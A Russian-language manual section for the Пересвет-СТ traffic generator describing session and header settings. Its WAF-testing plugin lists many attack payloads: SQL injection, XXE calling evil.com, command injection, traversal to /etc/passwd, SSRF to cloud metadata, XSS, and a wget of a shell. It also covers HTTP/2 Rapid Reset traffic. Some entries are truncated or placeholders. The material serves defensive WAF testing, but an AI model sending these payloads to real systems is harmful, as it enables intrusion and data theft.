HTTP статусОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы содержащие код ответа 3ХХ будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «location»Включить/выключить тумблер
HTML Meta RefreshОпция, отвечающая за отслеживание переадресации сессии в сторону цели. Если опция включена: все ответные запросы, содержащие в ответе HTML страницу с meta-тегом «refresh» будут отработаны и сессия вместе с последующим трафиком в рамках этой сессии будет перенаправлен в цель, указанную в заголовке «content», включая задержкуВключить/выключить тумблер
ГлубинаЗначение максимально допустимого количества переадресаций в рамках одной TCP сессииЗадайте свое значение (по умолчанию, значение равно «20»)
Query параметрыПараметры, передаваемые в URL после знака вопроса (?)Введите значение после нажатия кнопки «Добавить параметры»:
Введите свое значение;
${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)});
${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)});
${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)});
${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)});
${email} - Формирует валидный email со случайным именем пользователя и доменом;
${login} - Формирует валидный логин пользователя;
${password}- Формирует валидный пароль пользователя.
Тело запросаЧасть HTTP-запроса, содержащая данные, которые клиент отправляет серверу (например, форму или JSON). Параметр доступен если выбраны методы: POST, PUT или PATCHЗаполните поле «тело запроса» следующим образом: Введите значение тело запроса ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
ЗаголовкиДополнительные метаданные, отправляемые вместе с HTTP-запросом.Введите значение после нажатия кнопки «Добавить параметры»: Введите свое значение ${str(length)} - Формирует произвольную комбинацию символов заданной длины (пример: ${str(16)}) ${strMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов с длиной в указанных пределах (пример: ${strMinMax(16,24)}) ${hex(length)} - Формирует произвольную комбинацию символов заданной длины в шестнадцатеричном формате (пример: ${hex(16)}) ${hexMinMax(min\_length,max\_length)} - Формирует произвольную комбинацию символов в шестнадцатеричном формате в указанных пределах (пример: ${hexMinMax(16,24)}) ${email} - Формирует валидный email со случайным именем пользователя и доменом ${login} - Формирует валидный логин пользователя ${password}- Формирует валидный пароль пользователя
  1. Параметры сессии - параметры, касающиеся управления сессиями в рамках текущего плагина, описание которых указано в Табл. 14;

Табл. 14 – Параметры «Параметры сессии»

НазваниеОписаниеЗначение
Общее количество сессийМаксимальное количество одновременно активных сессий, которые могут быть установлены в рамках плагина.Задайте числовое значение
Тайм-аут повторного подключенияВремя в секундах, в течение которого Пересвет-СТ будет пытаться восстановить соединение после его разрыва. Если соединение не будет восстановлено в указанный период, сессия будет закрыта.Задайте числовое значение
Подключений в секундуМаксимальное количество новых сессий, которые могут быть установлены за одну секунду.Задайте числовое значение
Макс. стримов (на сессию)Максимальное количество потоков данных, которые могут быть активны в одной сессии. Параметр доступен только при включении H2 в «Параметрах HTTP».Задайте числовое значение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Запросов в секунду (на сессию)Максимальное количество запросов, которые могут быть обработаны в секунду для одной сессии/стрима.Задайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 15.

Табл. 15 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

WAF

WAF – плагин для генерации различного веб-трафика с заданными уязвимостями.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 16;

Табл. 16 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
  1. Цели - параметры для выбора объекта, в который будет направляться трафик (см .заголовок «Сети»), описание которых указаны в Табл. 17;

Табл. 17 – Параметры «Цели»

НазваниеОписаниеЗначение
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) - параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 18;

Табл. 18 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 19;

Табл. 19 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 20;

Табл. 20 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. Параметры HTTP - параметры настроек HTTP заголовков на уровне L6-L7 TPC/IP, описание которых указано в Табл. 21;

Табл. 21 – Параметры «Параметры HTTP»

НазваниеОписаниеЗначение
HTTPsУказывает, используется ли защищенный протокол передачи данных HTTPSДа / Нет (укажите текущее состояние переключателем тумблера)
Версия TLSВерсия TLS (Transport Layer Security) определяет протокол шифрования, используемый для обеспечения безопасной передачи данных между клиентом и сервером (Параметр доступен, если параметр HTTPs включен)выберите значение TLS v1.2 или TLS v1.3
Версия HTTPУказывает версию протокола HTTP, используемую для передачи данных.выберите значение HTTP 1.1 или HTTP 2.0
User-AgentЗаголовок, который идентифицирует клиентское приложение (например, браузер) и операционную систему, с которой осуществляется запрос.Введите значение заголовка: по умолчанию, значением заговолка является: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36» ${userAgent} - Обеспечивает ротацию User-Agent: для каждого запроса выбирается случайный валидный вариант из списка в веб-интерфейсе
  1. WAF модули – готовые вредоносные запросы, состоящие из следующих видов тестирования:

Базовое тестирование WAF, описание приведено в Табл. 22

Табл. 22 – Параметры «Базовое тестирование WAF»

НазваниеОписаниеЗначение
Broken Access ControlЗапрос на запрещенный путь(GET /admin/delete\_user?id=1)
Injection URL (SQLi)SQL в URL?id=1+union+select+1,2,3--
Injection JSON (SOLi)SQL в JSON({“user”: {“$ne”: null}})
Injection (Command)OS Command(GET /?id=system(cd /var/jet && make &\> /dev/null);)
Insecure DesingJSON логика({“action”: “makeAdmin”, “user”: “guest”})
Security MisconfigЗапрос на .git(Get /.git/config)
Outdated ComponentsУязвимый плагин WPGET /wp-content/plugins/revslider/temp/update\_extract/revslider/
Auth FailuresС подделкой токена(Cookie: auth\_token=invalid)
Data IntegrityФейковый JS(GET /cdn/js/app.js?v=999999999)
Path TraversalОбход файлов(GET /?home=/ ../ ../ ../ ../ ../)
SSRFЗапрос в медиаданные AWS({“url”: [http://169.254.169.254/latest/meta-data/](http://169.254.169.254/latest/meta-data/)})`
XSS: BasicБазовый XSS(<script\>alert(xss)</script>)
XSS: ObfuscatedОбфусцированный XSS(\<scr\<script\>ipt\>alert(xss)\</scr\<script\>ipt\>)
Bypass: SQLi with URL-encodingSQLi c URL-энкодингом( q=%27%20OR%201 %3D1-)
Evasion: Chunked EncodingChunked Encoding(Transfer-Encoging: chunked \+ encoded payloag)

Продвинутое тестирование WAF

SQLi Advanced, описание приведено в Табл. 23;

Генерирует различные SQL-инъекций: от простых UNION SELECT до обфусцированных и байпас-атак, включая Blind SQLi и Time-based SQLi. Проверяет устойчивость к попыткам обхода фильтрации SQL

Табл. 23 – Параметры « SQLi Advanced»

НазваниеЗначение
Basic UNOIN SELECT/?id=1+union+select+1,2,3--
Comment-obfuscated UNION/?id=1+un/\*\*/ion+se/\*\*lect+1,2,3--
Case-mised UNION/?id=1+UnIoN/\*\*/SeLecT/\*\*/1,2,3--
Double UNION-SELECT bypass/?id=1+UNunionION+SEselectLECT+1,2,3--
Vertical tab separation/?id=1+uni%0bon+se%0blect+1,2,3--
Division error + hex payload/?id=0+div+1+union%23foo\*%2F\*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent\_user
Massive hex payload/?id=1+and+(select%201)=(select%200x414141414141441414141414114141414141414141414141414141414141414141%E2%80%A6.)+union+select+1,2,version(),database(),user(),6,7,8,9,10
MySQL table dump/?id=1 /\*\!union select\*/ 1,table\_name from /\*\!information\_schema.tables\*/
Hex-encoded table/?id=1 /\*\!union select\*/ 1,column\_name from /\*\!information\_schema.columns where table\_name \= 0x7573657273\*/
Compact data extraction/?id=1 /\*\!union select\*/ /\*\!user,password\*/ from /\*\!users\*/
XP_CMDSHELL/?id=1\\'; EXEC master..xp\_cmdshell "net user zeq3ul UrWaFisShiT /add" \--
LPAD function'/id/1/\*\*/
Vertical tab LPAD/id/1%0b
Double-encoded UNION/?id=1%252f%252a\*/union%252f%252a/select%252f%252a\*/1,2,3%252f%252a\*/from%252f%252a\*/users--
Current_user/?id=0%20div%201%20union%20select%201,2,current\_user
MySQL-specific UNION/?id=1/\*\!UnIoN\*/SeLecT+1,2,3--
Concat table names/?id=/\*\!UnIoN\*/+/\*\!SeLecT\*/+1,2,concat(/\*\!table\_n%20ame\*/)+FrOm/\*\!information\_schema\*/.tables/\*\!WhErE\*/+/\*\!TaBlE\_sChEMa\*/%20+like+database()--
Query stacking 1/?q=select name\&q=password from users
Query stacking 2/?q=select name,password from users
Fragmented query/?q=select/\*\&q=\*/name& amp;q=password/\*\&q=\*/from/\*\&q=\*/users
Version concat/?p=-1 union /\*\!select\*/ concat\_ws(0x3a,version(),database(),user())
Column enum/?p=-373867 union select 1,2,column\_name,4,5 from information\_schema.columns/\*
Full system info/?p=-3195 union /\*\!select\*/ 0,1,2,3,4,5,6,7,8,9,concat\_ws(0x3a,@@version,user(),database(),@@version\_compile\_os),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
Subquery/?p=( ( SELECT @a ) OR 'b' ) \--
Function bypass/?p=( (SELECT 'a' ) OR COS ( 'b') ) \--
Version check/?p=-1' or 1=@@version \--
Char-based version/?p=3520 AND (version() like char(51,46,50,51,46,53,52))
Limit abuse/?p=1' union (select 's' from users limit 1,1)
Version 2/?p=-001 union select 1,2,3,4,5,version(),7,8,9,10
System user/?p=-1 or 1=(select system\_user)--
Char alert/?p=1 union select 1,char(72,97,99,107,101,100,32,98,121,32,91,32,99,97,115,104,32,93),3,4,5,6,7/\*
Substring/?p=22 AND SUBSTRING((y()),1,1)=x/\*
Benchmark/?p="+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
Nested benchmark/?p=)) and 0=benchmark(3000000,MD5(1))%20--
Waitfor delay/?p=),NULL)%20waitfor%20delay%20'0:0:20'%20--
Nested sleep/?p=,(select \* from (select(sleep(10)))a)
JSON extract/?p=-1748 OR JSON\_EXTRACT("{""nCvS"": 9981}", "$.nCvS") \= 9981\*7055
JSON array/?p=123 AND JSON\_ARRAY\_LENGTH("\[\]") \<= 294
JSON keys/?p=123") OR JSON\_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162766a71,(SELECT (ELT(4024=4024,1))),0x7178717a71)) USING utf8))) AND ("xWuM" LIKE "xWuM
Negative float/?p="union select \-7431.1, name, @aaa from u\_base--w-
Float compare/?p=or 123.22=123.22
Delay syntax/?p= waitfor delay '00:00:10'--
Nested sleep 2/?p=(select(0)from(select(sleep(15)))v)/\*'+(select(0)from(select(sleep(15)))v)+'%22+(select(0)from(select(sleep(15)))v)+%22\*/
JSON extract 2/?p=-1134') OR JSON\_EXTRACT('{\\"\\"aKER\\"\\": 9648}', '$.aKER') \= 9648\*7799 AND ('QlYa' LIKE 'QlYa
JSON depth/?p=123) AND 12=12 AND JSON\_DEPTH('{}') \!= 2521
ELT function/?p=123) AND ELT(5287=5287,5480) AND JSON\_ARRAY\_LENGTH('\[\]') \<= 2333
JSON keys 2/?p=123 AND JSON\_KEYS((SELECT CONVERT((SELECT CONCAT(0x7162766a71,(SELECT (ELT(1141=1141,1))),0x7178717a71)) USING utf8)))
JSON length/?p=123) AND (SELECT 'eNOW')='FsQu' AND JSON\_LENGTH('{}') \<= 9779
XXE Advanced, описание приведено в Табл. 24

Проверяет уязвимости в XML-парсерах. Используются атаки, способные раскрыть содержимое файлов, инициировать сетевые подключения и обойти ограничения.

Табл. 24 – Параметры «XXE Advanced»

НазваниеЗначение
External entity file read\<?xml version="1.0"?\>\<\!DOCTYPE root \[\<\!ENTITY test SYSTEM '\]\>\&test;file:///etc/passwd'\>\]\>\<root\>\&test;\</root\>
Base64 data scheme attack\<\!DOCTYPE test \[ \<\!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"\> %init; \]\>\<foo/\>
Remote DTD inclusion\<?xml version="1.0" encoding="ISO-8859-1"?\>\<\!DOCTYPE foo \[\<\!ELEMENT foo ANY \>\<\!ENTITY % xxe SYSTEM "http://evil.com/secret\_pass.txt" \>\]\>\<foo\>\&xxe;\</foo\> 
Collaborator-based SSRF\<\!DOCTYPE root \[\<\!ENTITY test SYSTEM '\]\>\&test;http://h3l9aaaaz81tmq5ztaaaaaa.burpcollaborator.net'\>\]\>\<root\>\&test;\</root\> 
Command Injection Advanced, описание приведено в Табл. 25

Проверяет, можно ли выполнить произвольные команды ОС через параметры запроса. Атаки охватывают как POSIX, так и Windows-окружения.

Табл. 25 – Параметры «Command Injection Advanced»

НазваниеЗначение
SQL-to-OS pivot/?id=10 and 1=0/(select top 1 table\_name from information\_schema.tables)
Obfuscated SQL-to-OS/?id=10 a%nd 1=0/(se%lect top 1 ta%ble\_name fr%om info%rmation\_schema.tables)
XPCMDSHELL User CreationCODEBLOCK2\_
Direct XPCMDSHELL CallCODEBLOCK3\_
Bracket Obfuscation/?xp\[cmdshell
Basic Command Chaining/?a=; ls
Newline Injection/?a=%0a ls
Subshell Execution/?a=$(ls)
Single Quote Escape/?a='ls'
Ampersand Separation/?a=& ls
URL-encoded Ampersand/?a=%26 ls
Double Ampersand/?a=1 && ls
URL-encoded Double Ampersand/?a=%26%26 ls
Pipe Separation/?a=
Double Pipe/?a=
Path Fragmentation/?a= '/b'i'n/l's'
Backslash Obfuscation/?a= /b\\\\in/l\\\\s
Variable Substitution/?a=cat$a /etc\#$a/passwd$a
File Injection Advanced, описание приведено в Табл. 26

Тестирует возможности внедрения через пути к файлам: php://, file://, zip:// и другие. Цель — получить доступ к конфиденциальным данным или исполняемым файлам.

Табл. 26 – Параметры «File Injection Advanced»

НазваниеЗначение
Basic Directory Traversal/?file=../bla.txt
Encoded Dot-Dot-Slash/?file=.%./bla.txt
PHP Filter Exploit via XML Entity/?a=\<\!ENTITY%20bin%20PUBLIC%20"php://filter/read=convert.%20base64-encode/resource=/path/to/binary/file"\>
Basic File Protocol/?p=file=/etc/passwd
File URI Scheme?p=file:///etc/passwd
PHP Base64 Filter/?p=php://filter/convert.base64-encode/resource=../../../../../etc/passwd
PHP Zlib Compression Filter/?p=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
Kubernetes Secrets via IPv6/?p=file://0000::001/var/run/secrets/kubernetes.io/serviceaccount
XML Injection Advanced, описание приведено в Табл. 27

Анализирует, как система обрабатывает пользовательские XML-вводы. Может привести к ошибкам парсинга или раскрытию данных.

Табл. 27 – Параметры «XML Injection Advanced»

НазваниеЗначение
XML Parser Logic Bypass/?test\[1=2test\_ \--
Path Traversal Advanced, описание приведено в Табл. 28

Тестирует обработку путей типа ../../etc/passwd и их различных обфускаций. Актуально для выявления доступа к защищённым системным файлам.

Табл. 28 – Параметры «Path Traversal Advanced»

НазваниеЗначение
Windows Path/?p=.../.../WINDOWS/win.ini
Null Byte Termination/?p=../../../../etc/passwd%00
JPG Null Byte/?p=../../../../etc/passwd%00jpg
Query Param Bypass/?p=../../../../etc/passwd?
Double Encoding/?p=%252e%252e%252fetc%252fpasswd
Double Encoded Null/?p=%252e%252e%252fetc%252fpasswd%00
Nested Slashes/?p=....//....//etc/passwd
Excessive Slashes/?p=..///////..////..//////etc/passwd
Backslash Bypass/?p=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
URL Encoded Slash/?p=..%2f..%2f..%2f..%2fetc%2fpasswd
Dot Encoding/?p=%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
Triple Encoding/?p=..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
Backslash Encoding/?p=..%255c..%255c..%255c..%255cetc%255cpasswd
Unicode Bypass/?p=..%c0%af..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
Dot Overload/?p=%252e%252e%252e%252e%252e%252eetcpasswd'
C1 Byte Bypass/?p=..%c1%9c..%c1%9c..%c1%9c..%c1%9cetc%c1%9cpasswd
UNC Path Traversal Advanced, описание приведено в Табл. 29

Использует пути вида \host\c$\windows\win.ini для тестирования доступа к удалённым или локальным системным ресурсам через нестандартные методы.

Табл. 29 – Параметры « UNC Path Traversal Advanced»

НазваниеЗначение
IPv6 UNC Path/?p=0::001c$windowswin.ini
Registry Access/?p=::1c$usersdefault\\ntuser.dat
Localhost UNC/?p=localhostc$windowswin.ini
Long Path Bypass/?p=file:////////////////////////c
RCE Advanced, описание приведено в Табл. 30

Имитация атак на уязвимости типа ShellShock, инъекции PHP/JS, и обход фильтров для выполнения произвольного кода на целевом сервере.

Табл. 30 – Параметры « RCE Advanced»

НазваниеЗначение
ShellShock Exploit/?p=() { :; }; echo ; /bin/bash \-c 'cat /etc/passwd'
PHP Short Tag/?p=\<?=$\_POST\[00\]?\>
Command Concatenation/?p=; cat /et'c/pa's's'wd
IP-based Execution/?p=cmd=127.0.0.1 && ls /etc
String Reversal/?p=$(printf 'hsab/nib/ e- 4321 1.0.0.721 cn'
Variable Obfuscation/?p=cat$IFS$9${PWD\[a-z\]\*}e\*c${PWD\[a−za-z\]\*}p?ss??
GraphQL Advanced, описание приведено в Табл. 31

Автоматически отправляет нестандартные, глубоко вложенные и мутированные запросы GraphQL для выявления пробелов в валидации и контроле типов.

Табл. 31 – Параметры «GraphQL Advanced»

НазваниеЗначение
Basic Schema Extraction/?query={ \_\_schema { types { name } } }
Deep Type Introspection/?query={\_\_schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}directives{name description locations args{...InputValue}}}}fragment FullType on \_\_Type{kind name description fields(includeDeprecated:true){name description args{...InputValue}type{...TypeRef}isDeprecated deprecationReason}inputFields{...InputValue}interfaces{...TypeRef}enumValues(includeDeprecated:true){name description isDeprecated deprecationReason}possibleTypes{...TypeRef}}fragment InputValue on \_\_InputValue{name description type{...TypeRef}defaultValue}fragment TypeRef on \_\_Type{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name ofType{kind name}}}}}}}}
XSS Advanced, описание приведено в Табл. 32

Проверка на возможность внедрения JavaScript-кода в веб-страницу. Используются payload'ы для DOM-based, reflected и stored XSS.

Табл. 32 – Параметры «XSS Advanced»

НазваниеЗначение
Body Onload/?q=\<body onload=alert('test1')\>
Mouseover Event/?q=\<b onmouseover=alert('Wufff\!')\>click me\!\</b\>
Image Error/?q=\<img/src=x/onerror=xxx
Wheel Event/?q="onwheel=alert(111)
Prototype Pollution/?q=?\_\_proto\_\_\[innerHTMLinnerHTML\]=\<img/src/onerror%3dalert(1)\>
Closure Base Path/?q=?\_\_proto\_\_\[CLOSURE_BASE_PATHCLOSURE\_BASE\_PATH\]=data:,alert(1)//
Vue.js Exploit/?q=\_\_proto\_\_\[v−ifv-if\]=\_c.export constructor('alert(1)')()
SVG MIME Abuse/?q=sometext\<svg onload=alert(document.domain)\>?mimeType=text/html
SVG Short/?q='\>\<svg/onload=alertxss\>
Exception Handler/?q="\])}``catch(e){if(\!this.x)alert(document.domain),this.x=1}//
Self XSS/?q="));if(\!self.x)self.x=\!alert(document.domain)}``catch(e){}//
Image Error 2/?q=\<img src=x onerror=alert(document.domain)\>/all
JavaScript Pseudo/?q=javascript:setInterval('ale'+'rt(document.domain)')
Map Confirm/?q="Onclick="(\[11\].map(confirm))
Base64 Image/?q=\<img\\nsrc=data:image/gif;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=\\nonload=alert(1)\>
Autofocus Bypass/?q=\\\\"autofocus=alert(1)//
External Entity/?a=\<\!ENTITY%20pay%20SYSTEM%20"http://example.com/payload.xml"\>
Doctype Short/?a=\<\!DOCTYPE :. SYTEM "http://"
Complex Doctype/?a=\<\!DOCTYPE :\_-\_: SYTEM "http://"
SSRF Advanced, описание приведено в Табл. 33

Тестирует возможность заставить сервер делать HTTP-запросы от своего имени к внутренним сервисам, metadata API или внешним адресам.

Табл. 33 – Параметры «SSRF Advanced»

НазваниеЗначение
Cloud Metadata/?q=https://somehost/metadata/instance
Telnet IPv4/?q=telnet://2852039166/
IPv6 Transition/?q=http://\[::ffff:a9fe:a9fe\]/
AWS Metadata/?q=http://\[0:0:0:0:0:ffff:169.254.169.254\]/latest/meta-data/
OpenStack Metadata/?q=http://169.254.169.254/openstack
Octal Encoding/?q=http://0251.00376.000251.0000376/
Shortened IP/?q=http://0251.254.169.254
Localhost/?q=http://0.0.0.0:80
Gopher Protocol/?q=gopher://0.0.0.0:443
SSH Port/?q=http://0.0.0.0:22
FTP IPv4/?q=ftp://3232235521/
Short Port/?q=http://0:8080/
Minimal URL/?q=http://0/
Link-Local/?q=http://169.254.169.254
IMAP/?q=imap://2130706433
Wildcard IPv6/?q=http://\[::::\]
Compressed IPv6/?q=http://0000::1
Unicode Gopher/?q=gopher://%EF%BD%9A%EF%BD%9A%EF%BD%9A
TFTP Unicode/?q=tftp://%F0%9D%9F%8E%F0%9D%9F%8E%F0%9D%9F%8E
SSI/SSTI Advanced, описание приведено в Табл. 34

Атаки на шаблонизаторы (Jinja2, Freemarker и др.) и SSI-инструкции. Цель — выполнить команды или прочитать файлы через шаблонную логику.

Табл. 34 – Параметры «SSI/SSTI Advanced»

НазваниеЗначение
SSI Command/?q=\<\!--\#exec cmd="wget http://some\_host/shell.txt
SSI List Dir/?q=\<\!--\#exec cmd="ls" \--\>
SSI Windows Dir/?q=\<\!--\#exec cmd="dir" \--\>
Java Resource/?q=${class.getResource("./test/test.res").getContent()}
Twig RCE/?q={{\_self.env.registerUndefinedFilterCallback("exec")}}{{\_self.env.getFilter("id")}}
Freemarker RCE/?q=\<\#assign ex \= "freemarker.template.utility.Execute"?new()\>${ ex("id")}
Python Attribute/?q={{request
  1. Параметры сессии - параметры, касающиеся управления сессиями в рамках текущего плагина, описание которых указаны в Табл. 35

    Табл. 35 – Параметры «Сессии»

НазваниеОписаниеЗначение
Общее количество сессийМаксимальное количество одновременно активных сессий, которые могут быть установлены в рамках плагина.Задайте числовое значение
Тайм-аут повторного подключенияВремя в секундах, в течение которого Пересвет-СТ будет пытаться восстановить соединение после его разрыва. Если соединение не будет восстановлено в указанный период, сессия будет закрыта.Задайте числовое значение
Подключений в секундуМаксимальное количество новых сессий, которые могут быть установлены за одну секунду.Задайте числовое значение
Макс. стримов (на сессию)Максимальное количество потоков данных, которые могут быть активны в одной сессии. Параметр доступен только при включении H2 в «Параметрах HTTP».Задайте числовое значение
Тумблер «Без ограничения»Максимальная производительность без ограничений на кол-во отправляемых запросов в секундуВключить/выключить
Запросов в секунду (на сессию)Максимальное количество запросов, которые могут быть обработаны в секунду для одной сессии/стрима.Задайте числовое значение
Интервал между отправкой запросовОпция позволяет настроить задержку между отправкой заданного кол-ва запросов в секунду.Задайте числовое значение
  1. Длительность - параметр, отвечающий за время работы плагина, описание которого указано в Табл. 36.

Табл. 36 – Параметр «Длительность»

НазваниеОписаниеЗначение
Длительность генерацииВремя генерации трафикаЗадайте числовое значение и выберите величину (в секундах, минутах или часах)

HTTP/2 Rapid Reset

HTTP/2 Rapid Reset – плагин для генерации различного веб-трафика с механизмом в протоколе HTTP/2, который позволяет быстро сбрасывать соединения.

Данный плагин состоит из следующих параметров:

  1. Источники – совокупность из выбранного агента, интерфейсов и MAC-адресов с которых агент будет отправлять и принимать трафик. Описание параметров указаны в Табл. 37;

Табл. 37 – Параметры «Источники»

НазваниеОписаниеЗначение
АгентАгент, с которого будет отправляться трафик и с который будет принимать трафик.выберите агент из списка агентов
Сетевой интерфейсСетевой интерфейс агента, с которого будет отправляться трафик и с который будет принимать трафиквыберите интерфейс из списка интерфейсов
СетьВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика. Если выбрано более одного объекта, можно изменить параметр «вес», отвечающий за балансировку распределения пакетов между выбранными объектами «Сети».выберите объект «Сети» из списка объектов. Задайте вес (по умолчанию, вес распределяет равномерно пакеты между объектами «Сети»)
  1. Цели - параметры для выбора объекта, в который будет направляться трафик (см .заголовок «Сети»), описание которых указаны в Табл. 38;

Табл. 38 – Параметры «Цели»

НазваниеОписаниеЗначение
ЦельВыбранные объект «Сети» (см. раздел «Сети») параметры которого будут использоваться для отправки трафика в выбранную цель.выберите объект «Сети» из списка объектов.
  1. IP заголовок (L3) - параметры настроек IP заголовков на уровне L3 TPC/IP, описание которых указаны в Табл. 39;

Табл. 39 – Параметры «IP заголовок (L3)»

НазваниеОписаниеЗначение
TTL (Time to Live)Параметр TTL определяет максимальное количество маршрутизаторов (хопов), через которые может пройти пакет данных, прежде чем он будет отброшен.Задайте числовое значение (по умолчанию, значение TTL является: «128»)
ToS (Type of Service)DSCP — это поле в заголовке IP-пакета, которое используется для определения приоритета и обработки трафикаЗадайте числовое значение (по умолчанию, значение DSCP является: «7»)
ToS (Type of Service)ECN — это механизм, который позволяет маршрутизаторам уведомлять узлы о перегрузках в сети без сброса пакетов.выберите значение из списка: 00 (Non-ECT) 01 (ECT(1)) 10 (ECT(0)) 11 (CE (Congestion Experienced))
  1. TCP заголовок (L4) – параметры настроек IP заголовков на уровне L4 TPC/IP, описание которых указаны в Табл. 40;

Табл. 40 – Параметры «TCP заголовок (L4)»

НазваниеОписаниеЗначение
Max. Segment Size (Максимальный размер сегмента)Максимальный размер сегмента определяет максимальный объем данных, который может быть передан в одном TCP-сегментеЗадайте числовое значение (по умолчанию, значение Max. Segment Size является: «1460»)
WS (IP Options)Параметр WS (Window Scale) относится к механизму масштабирования окна TCP, который позволяет увеличить размер окна для управления потоком данных.Задайте числовое значение (по умолчанию, значение WS является: «64»)
Window Size (Размер окна)Размер окна TCP определяет объем данных, который может быть отправлен без ожидания подтверждения от получателя.Задайте числовое значение (по умолчанию, значение Window Size является: «256»)
  1. Параметры HTTP - параметры настроек HTTP заголовков на уровне L6-L7 TPC/IP, описание которых указано в Табл. 41;

Табл. 41 – Параметры «Параметры HTTP»

НазваниеОписаниеЗначение
HTTPsУказывает, используется ли защищенный протокол передачи данных HTTPSДа / Нет (укажите текущее состояние переключателем тумблера)
Версия TLSВерсия TLS (Transport Layer Security) определяет протокол шифрования, используемый для обеспечения безопасной передачи данных между клиентом и сервером (Параметр доступен, если параметр HTTPs включен)выберите значение TLS v1.2 или TLS v1.3
